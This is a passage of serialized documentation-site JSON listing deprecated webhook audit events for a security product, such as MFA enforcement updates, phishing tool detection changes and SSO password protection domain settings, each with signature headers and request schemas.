removed"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_727","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_727"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/webhook-removed/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/webhook-removed-event"}],"panels":[]}]},"httpPath":"webhook-removed"},{"label":"App banner configured","deprecated":true,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/app-banner-configured-event","routeSlug":"/webhooks-v1/audit/app-banner-configured-event","metadata":{"seo":{"title":"App banner configured","description":"An app banner was configured."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"app-banner-configured-event","name":"App banner configured","deprecated":true,"isWebhook":true,"pointer":"/paths/app-banner-configured/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"App banner configured","isWebhook":true,"deprecated":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An app banner was configured."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/app-banner-configured/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_728"}},"schemaId":"schema_728","pointer":"/paths/app-banner-configured/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"app-banner-configured","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_728"}},"responseCodes":["2XX"],"pointer":"app-banner-configured","href":"audit/app-banner-configured-event","openApiOperationId":"app-banner-configured-event","summary":"App banner configured"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_728","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_728"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/app-banner-configured/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/app-banner-configured-event"}],"panels":[]}]},"httpPath":"app-banner-configured"},{"label":"App banner enabled","deprecated":true,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/app-banner-enabled-event","routeSlug":"/webhooks-v1/audit/app-banner-enabled-event","metadata":{"seo":{"title":"App banner enabled","description":"An app banner was enabled or disabled."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"app-banner-enabled-event","name":"App banner enabled","deprecated":true,"isWebhook":true,"pointer":"/paths/app-banner-enabled/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"App banner enabled","isWebhook":true,"deprecated":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An app banner was enabled or disabled."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/app-banner-enabled/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_729"}},"schemaId":"schema_729","pointer":"/paths/app-banner-enabled/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"app-banner-enabled","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_729"}},"responseCodes":["2XX"],"pointer":"app-banner-enabled","href":"audit/app-banner-enabled-event","openApiOperationId":"app-banner-enabled-event","summary":"App banner enabled"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_729","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_729"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/app-banner-enabled/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/app-banner-enabled-event"}],"panels":[]}]},"httpPath":"app-banner-enabled"},{"label":"MFA enforcement apps updated","deprecated":true,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/mfa-enforcement-apps-updated-event","routeSlug":"/webhooks-v1/audit/mfa-enforcement-apps-updated-event","metadata":{"seo":{"title":"MFA enforcement apps updated","description":"An admin user has updated which apps the MFA enforcement control is enabled for."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"mfa-enforcement-apps-updated-event","name":"MFA enforcement apps updated","deprecated":true,"isWebhook":true,"pointer":"/paths/mfa-enforcement-apps-updated/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"MFA enforcement apps updated","isWebhook":true,"deprecated":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has updated which apps the MFA enforcement control is enabled for."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/mfa-enforcement-apps-updated/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_730"}},"schemaId":"schema_730","pointer":"/paths/mfa-enforcement-apps-updated/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"mfa-enforcement-apps-updated","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_730"}},"responseCodes":["2XX"],"pointer":"mfa-enforcement-apps-updated","href":"audit/mfa-enforcement-apps-updated-event","openApiOperationId":"mfa-enforcement-apps-updated-event","summary":"MFA enforcement apps updated"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_730","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_730"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/mfa-enforcement-apps-updated/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/mfa-enforcement-apps-updated-event"}],"panels":[]}]},"httpPath":"mfa-enforcement-apps-updated"},{"label":"MFA enforcement settings updated","deprecated":true,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/mfa-enforcement-settings-updated-event","routeSlug":"/webhooks-v1/audit/mfa-enforcement-settings-updated-event","metadata":{"seo":{"title":"MFA enforcement settings updated","description":"An admin user has updated the MFA enforcement control settings."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"mfa-enforcement-settings-updated-event","name":"MFA enforcement settings updated","deprecated":true,"isWebhook":true,"pointer":"/paths/mfa-enforcement-settings-updated/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"MFA enforcement settings updated","isWebhook":true,"deprecated":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has updated the MFA enforcement control settings."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/mfa-enforcement-settings-updated/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_731"}},"schemaId":"schema_731","pointer":"/paths/mfa-enforcement-settings-updated/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"mfa-enforcement-settings-updated","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_731"}},"responseCodes":["2XX"],"pointer":"mfa-enforcement-settings-updated","href":"audit/mfa-enforcement-settings-updated-event","openApiOperationId":"mfa-enforcement-settings-updated-event","summary":"MFA enforcement settings updated"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_731","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_731"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/mfa-enforcement-settings-updated/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/mfa-enforcement-settings-updated-event"}],"panels":[]}]},"httpPath":"mfa-enforcement-settings-updated"},{"label":"Phishing tool detection page updated","deprecated":true,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/phishing-tool-detection-page-updated-event","routeSlug":"/webhooks-v1/audit/phishing-tool-detection-page-updated-event","metadata":{"seo":{"title":"Phishing tool detection page updated","description":"An admin user has updated the page settings of the Phishing tool detection feature."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"phishing-tool-detection-page-updated-event","name":"Phishing tool detection page updated","deprecated":true,"isWebhook":true,"pointer":"/paths/phishing-tool-detection-page-updated/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Phishing tool detection page updated","isWebhook":true,"deprecated":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has updated the page settings of the Phishing tool detection feature."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/phishing-tool-detection-page-updated/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_732"}},"schemaId":"schema_732","pointer":"/paths/phishing-tool-detection-page-updated/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"phishing-tool-detection-page-updated","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_732"}},"responseCodes":["2XX"],"pointer":"phishing-tool-detection-page-updated","href":"audit/phishing-tool-detection-page-updated-event","openApiOperationId":"phishing-tool-detection-page-updated-event","summary":"Phishing tool detection page updated"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_732","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_732"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/phishing-tool-detection-page-updated/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/phishing-tool-detection-page-updated-event"}],"panels":[]}]},"httpPath":"phishing-tool-detection-page-updated"},{"label":"Phishing tool detection mode updated","deprecated":true,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/phishing-tool-detection-mode-updated-event","routeSlug":"/webhooks-v1/audit/phishing-tool-detection-mode-updated-event","metadata":{"seo":{"title":"Phishing tool detection mode updated","description":"An admin user has updated the mode of the Phishing tool detection feature."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"phishing-tool-detection-mode-updated-event","name":"Phishing tool detection mode updated","deprecated":true,"isWebhook":true,"pointer":"/paths/phishing-tool-detection-mode-updated/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Phishing tool detection mode updated","isWebhook":true,"deprecated":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has updated the mode of the Phishing tool detection feature."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/phishing-tool-detection-mode-updated/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_733"}},"schemaId":"schema_733","pointer":"/paths/phishing-tool-detection-mode-updated/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"phishing-tool-detection-mode-updated","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_733"}},"responseCodes":["2XX"],"pointer":"phishing-tool-detection-mode-updated","href":"audit/phishing-tool-detection-mode-updated-event","openApiOperationId":"phishing-tool-detection-mode-updated-event","summary":"Phishing tool detection mode updated"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_733","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_733"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/phishing-tool-detection-mode-updated/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/phishing-tool-detection-mode-updated-event"}],"panels":[]}]},"httpPath":"phishing-tool-detection-mode-updated"},{"label":"SSO password protection ignored domains added","deprecated":true,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/sso-password-protection-ignored-domains-added-event","routeSlug":"/webhooks-v1/audit/sso-password-protection-ignored-domains-added-event","metadata":{"seo":{"title":"SSO password protection ignored domains added","description":"A set of domains have been added to the list of ignored domains for the SSO password protection feature."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"sso-password-protection-ignored-domains-added-event","name":"SSO password protection ignored domains added","deprecated":true,"isWebhook":true,"pointer":"/paths/sso-password-protection-ignored-domains-added/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"SSO password protection ignored domains added","isWebhook":true,"deprecated":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A set of domains have been added to the list of ignored domains for the SSO password protection feature."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/sso-password-protection-ignored-domains-added/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_734"}},"schemaId":"schema_734","pointer":"/paths/sso-password-protection-ignored-domains-added/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"sso-password-protection-ignored-domains-added","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_734"}},"responseCodes":["2XX"],"pointer":"sso-password-protection-ignored-domains-added","href":"audit/sso-password-protection-ignored-domains-added-event","openApiOperationId":"sso-password-protection-ignored-domains-added-event","summary":"SSO password protection ignored domains added"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_734","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_734"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/sso-password-protection-ignored-domains-added/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/sso-password-protection-ignored-domains-added-event"}],"panels":[]}]},"httpPath":"sso-password-protection-ignored-domains-added"},{"label":"SSO password protection ignored domains removed","deprecated":true,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/sso-password-protection-ignored-domains-removed-event","routeSlug":"/webhooks-v1/audit/sso-password-protection-ignored-domains-removed-event","metadata":{"seo":{"title":"SSO password protection ignored domains removed","description":"A set of domains have been removed from the list of ignored domains for the SSO password protection feature."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"sso-password-protection-ignored-domains-removed-event","name":"SSO password protection ignored domains removed","deprecated":true,"isWebhook":true,"pointer":"/paths/sso-password-protection-ignored-domains-removed/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"SSO password protection ignored domains removed","isWebhook":true,"deprecated":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A set of domains have been removed from the list of ignored domains for the SSO password protection feature."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/sso-password-protection-ignored-domains-removed/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_735"}},"schemaId":"schema_735","pointer":"/paths/sso-password-protection-ignored-domains-removed/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"sso-password-protection-ignored-domains-removed","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_735"}},"responseCodes":["2XX"],"pointer":"sso-password-protection-ignored-domains-removed","href":"audit/sso-password-protection-ignored-domains-removed-event","openApiOperationId":"sso-password-protection-ignored-domains-removed-event","summary":"SSO password protection ignored domains removed"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_735","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_735"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/sso-password-protection-ignored-domains-removed/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/sso-password-protection-ignored-domains-removed-event"}],"panels":[]}]},"httpPath":"sso-password-protection-ignored-domains-removed"},{"label":"SSO password protection ignore work apps toggled","deprecated":true,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/sso-password-protection-ignore-work-apps-toggled-event","routeSlug":"/webhooks-v1/audit/sso-password-protection-ignore-work-apps-toggled-event","metadata":{"seo":{"title":"SSO password protection ignore work apps toggled","description":"An admin user has toggled the \"Ignore work apps\" setting of the SSO password protection feature."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"sso-password-protection-ignore-work-apps-toggled-event","name":"SSO password protection ignore work apps toggled","deprecated":true,"isWebhook":true,"pointer":"/paths/sso-password-protection-ignore-work-apps-toggled/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"SSO password protection ignore work apps toggled","isWebhook":true,"deprecated":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has toggled the \"Ignore work apps\" setting of the SSO password protection feature."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/sso-password-protection-ignore-work-apps-toggled/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_736"}},"schemaId":"schema_736","pointer":"/paths/sso-password-protection-ignore-work-apps-toggled/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"sso-password-protection-ignore-work-apps-toggled","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_736"}},"responseCodes":["2XX"],"pointer":"sso-password-protection-ignore-work-apps-toggled","href":"audit/sso-password-protection-ignore-work-apps-toggled-event","openApiOperationId":"sso-password-protection-ignore-work-apps-toggled-event","summary":"SSO password protection ignore work apps toggled"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_736","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_736"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/sso-password-protection-ignore-work-apps-toggled/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/sso-password-protection-ignore-work-apps-toggled-event"}],"panels":[]}]},"httpPath":"sso-password-protection-ignore-work-apps-toggled"},{"label":"SSO password protection mode updated","deprecated":true,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/sso-password-protection-mode-updated-event","routeSlug":"/webhooks-v1/audit/sso-password-protection-mode-updated-event","metadata":{"seo":{"title":"SSO password protection mode updated","description":"An admin user has updated the mode of the SSO password protection feature."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"sso-password-protection-mode-updated-event","name":"SSO password protection mode updated","deprecated":true,"isWebhook":true,"pointer":"/paths/sso-password-protection-mode-updated/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"SSO password protection mode updated","isWebhook":true,"deprecated":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has updated the mode of the SSO password protection feature."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/sso-password-protection-mode-updated/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request 